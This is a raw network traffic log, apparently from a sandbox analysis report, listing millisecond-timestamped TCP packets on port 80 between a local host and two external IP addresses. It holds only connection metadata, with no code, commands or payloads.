Mar 28, 2024 09:15:00.032736063 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.032761097 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.032763004 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.032803059 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.032814026 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.032833099 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.032836914 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.032871962 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.032908916 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.032922983 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.032931089 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.032965899 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.032991886 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.033015013 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.033046007 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.033056974 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.033116102 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.033132076 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.033138990 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.033164978 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.033181906 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.033199072 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.033206940 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.033236027 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.033262014 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.033296108 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.033323050 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.033325911 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.033375978 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.033395052 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.033417940 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.033421993 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.033459902 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.033485889 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.033560991 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.033575058 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.033586025 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.033595085 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.033618927 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.033627987 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.033653975 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.033654928 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.033663034 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.033687115 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.033703089 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.033720016 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.033730030 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.033751965 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.033757925 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.033767939 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.033785105 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.033791065 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.033802986 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.033809900 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.033828974 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.033832073 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.033863068 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.033889055 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.033896923 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.033907890 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.033934116 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.033950090 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.033953905 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.033987045 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.033994913 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.034008026 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.034014940 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.034030914 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.034054995 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.034085989 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.034094095 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.034106970 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.034132957 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.034137011 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.034141064 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.034145117 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.034147978 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.034162998 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.034181118 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.034202099 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.034219980 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.034251928 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.034252882 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.034260035 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.034276962 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.034286976 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.034297943 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.034307957 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.034327030 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.034333944 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.034349918 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.034353018 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.034368038 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.034384966 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.034399986 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.034408092 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.034431934 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.034444094 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.034471989 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.034475088 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.034512043 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.034523964 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.034531116 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.034568071 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.034578085 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.034603119 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.034606934 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.034612894 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.034643888 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.034651041 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.034652948 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.034672022 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.034678936 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.034707069 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.034722090 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.034734964 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.034759998 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.034764051 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.034799099 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.034858942 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.034868002 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.034897089 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.034899950 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.034931898 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.034945011 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.034954071 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.034977913 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.035005093 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.035017967 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.035043955 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.035048962 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.035073996 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.035085917 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.035115004 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.035145998 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.035151958 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.035176992 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.035192966 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.035233974 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.035242081 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.035264969 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.035267115 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.035317898 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.035351038 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.035363913 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.035377979 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.035384893 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.035398006 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.035425901 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.035444021 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.035473108 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.035511971 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.035566092 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.035598040 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.035607100 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.035615921 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.035624981 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.035649061 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.035660028 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.035667896 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.035687923 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.035697937 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.035725117 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.035728931 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.035737038 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.035748959 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.035768986 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.035813093 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.035820961 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.035841942 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.035847902 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.035850048 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.035867929 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.035871983 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.035890102 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.035914898 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.035916090 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.035923958 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.035938025 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.035960913 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.035975933 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.035983086 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.035990000 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.036012888 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.036020041 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.036031961 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.036051035 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.036052942 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.036076069 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.036102057 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.036109924 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.036123991 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.036130905 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.036145926 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.036170006 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.036173105 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.036214113 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.036215067 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.036230087 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.036236048 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.036263943 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.036288977 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.036302090 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.036326885 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.036334991 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.036338091 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.036365986 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.036390066 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.036397934 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.036417007 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.036423922 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.036427021 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.036453962 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.036468983 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.036478043 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.036492109 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.036514997 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.036519051 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.036530972 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.036545992 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.036564112 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.036565065 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.036586046 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.036621094 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.036629915 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.036644936 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.036653042 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.036663055 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.036684036 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.036712885 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.036744118 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.036751986 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.036753893 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.036776066 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.036792040 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.036808014 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.036837101 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.036849022 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.036858082 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.036890984 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.036899090 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.036911964 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.036926031 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.036935091 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.036941051 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.036947012 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.036966085 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.036999941 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.037019014 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.037025928 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.037045002 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.037059069 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.037067890 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.037096977 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.037126064 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.037139893 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.037147045 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.037162066 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.037183046 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.037213087 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.037220955 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.037236929 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.037250042 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.037271023 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.037282944 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.037301064 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.037313938 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.037337065 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.037344933 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.037347078 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.037379026 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.037379980 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.037388086 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.037424088 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.037426949 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.037431955 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.037468910 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.037472010 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.037480116 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.037503958 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.037516117 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.037549973 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.037575006 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.037623882 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.037650108 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.037666082 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.037682056 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.037693024 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.037707090 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.037714958 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.037728071 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.037745953 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.037775040 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.037791967 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.037811995 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.037820101 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.037846088 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.037851095 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.037869930 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.037882090 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.037906885 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.037908077 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.037939072 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.037976027 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.038002014 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.038008928 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.038012028 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.038014889 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.038034916 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.038043022 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.038058043 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.038069963 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.038094044 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.038106918 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.038114071 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.038135052 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.038135052 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.038142920 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.038165092 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.038173914 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.038177013 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.038193941 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.038194895 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.038217068 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.038218021 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.038238049 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.038256884 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.038258076 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.038280964 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.038310051 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.038311005 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.038336039 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.038377047 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.038393021 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.038474083 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.038490057 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.038511038 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.039870977 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.039897919 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.039926052 CET	49735	80	192.168.2.4	5.42.66.22
